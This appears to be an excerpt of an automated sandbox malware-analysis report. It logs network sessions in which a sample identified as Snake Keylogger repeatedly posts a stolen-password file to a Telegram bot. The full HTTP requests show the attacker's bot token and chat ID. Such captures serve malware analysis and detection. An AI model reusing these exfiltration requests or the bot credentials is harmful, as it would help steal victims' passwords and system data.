                                                                    2022-06-26 07:34:17 UTC388OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 66 38 61 35 35 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570f8a5578Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:18 UTC389INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:18 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:18 UTC389INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67008,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228858,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    231192.168.2.550142149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:18 UTC390OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570fcd1726
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:18 UTC390OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 66 63 64 31 37 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570fcd1726Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:18 UTC390INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:18 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:18 UTC391INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67009,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228858,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    232192.168.2.550143149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:18 UTC391OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571003ec9f
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:18 UTC392OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 30 30 33 65 63 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571003ec9fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:18 UTC392INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:18 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:18 UTC392INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67010,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228858,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    233192.168.2.550144149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:18 UTC393OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757103f87eb
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:18 UTC393OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 30 33 66 38 37 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757103f87ebContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:19 UTC394INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:19 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:19 UTC394INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67012,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228859,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    234192.168.2.550145149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:19 UTC395OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575710765e06
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:19 UTC395OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 30 37 36 35 65 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575710765e06Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:19 UTC395INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:19 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:19 UTC396INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67013,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228859,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    235192.168.2.550146149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:19 UTC396OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575710b1f912
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:19 UTC397OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 30 62 31 66 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575710b1f912Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:20 UTC397INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:20 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:20 UTC398INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67014,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228859,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    236192.168.2.550147149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:20 UTC398OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575710e8ce44
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:20 UTC398OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 30 65 38 63 65 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575710e8ce44Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:20 UTC399INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:20 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:20 UTC399INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67015,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228860,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    237192.168.2.550148149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:20 UTC400OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757112469db
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
